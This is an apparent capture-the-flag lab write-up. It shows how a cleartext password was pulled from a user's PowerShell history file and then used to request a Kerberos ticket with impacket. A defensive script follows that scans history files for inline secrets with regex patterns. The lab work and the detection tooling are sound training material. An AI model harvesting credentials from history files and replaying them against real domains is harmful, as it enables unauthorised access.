Console History
Checking the user's home directory after gaining a PowerShell session as the dallon.matrix user
PS C:\Users\dallon.matrix\AppData\Roaming\Microsoft> cat Windows\PowerSHell\PSReadLine\ConsoleHost_history.txt
$SecPassword = ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('dallon.matrix', $SecPassword);
A CLEARTEXT credential for the dallon.matrix user is exposed in the PowerShell command history. PJsO1du$CVJ#D is the password.
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ impacket-getTGT 'AXLLE.HTB/dallon.matrix@mainframe.axlle.htb' -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: PJsO1du$CVJ#D
[*] Saving ticket in dallon.matrix@mainframe.axlle.htb.ccache
Validated. TGT generated for the dallon.matrix user.
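
From the defender's side, the same PSReadLine history file can be audited for inline secrets like the one found above. The script below is an added example, not part of the original notes; the function name Find-HistorySecret, the rule names and regexes, and the sample history lines are all constructed for illustration.

```powershell
# Added example: flag PSReadLine history lines that embed a secret.
# Rule names, regexes and Find-HistorySecret are hypothetical, not from the notes.
$Rules = [ordered]@{
    'SecureString from plaintext' = '(?i)ConvertTo-SecureString\b.*-AsPlainText'
    'Password-like parameter'     = '(?i)\s[-/](password|passwd|pwd|secret|token)\b[:\s]+\S+'
    'net user with password'      = '(?i)\bnet(\.exe)?\s+user\s+\S+\s+[^/*\s]\S*'
}

function Find-HistorySecret {
    param([Parameter(Mandatory)][string[]]$Path)
    foreach ($file in $Path) {
        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $file) {
            $lineNo++
            foreach ($name in $Rules.Keys) {
                if ($line -match $Rules[$name]) {
                    [pscustomobject]@{
                        File = $file
                        Line = $lineNo
                        Rule = $name
                        # Redact quoted literals so the report does not re-leak the secret.
                        Text = $line -replace "'[^']*'", "'<redacted>'" -replace '"[^"]*"', '"<redacted>"'
                    }
                    break   # one finding per line is enough
                }
            }
        }
    }
}

# Constructed sample history file (not real data) so the script runs offline.
$sample = Join-Path ([IO.Path]::GetTempPath()) 'ConsoleHost_history.sample.txt'
@'
Get-ChildItem C:\Temp
$SecPassword = ConvertTo-SecureString 'Constructed-Example-1' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('example.user', $SecPassword);
whoami /groups
'@ | Set-Content -LiteralPath $sample

# Only line 2 is reported; line 3 references the variable, not the secret itself.
Find-HistorySecret -Path $sample | Format-List
Remove-Item -LiteralPath $sample
```

To audit a live host, pass the files matched by C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt instead of the sample; (Get-PSReadLineOption).HistorySavePath returns the current user's path. Prompting with Get-Credential instead of typing the password as a literal keeps it out of the history file.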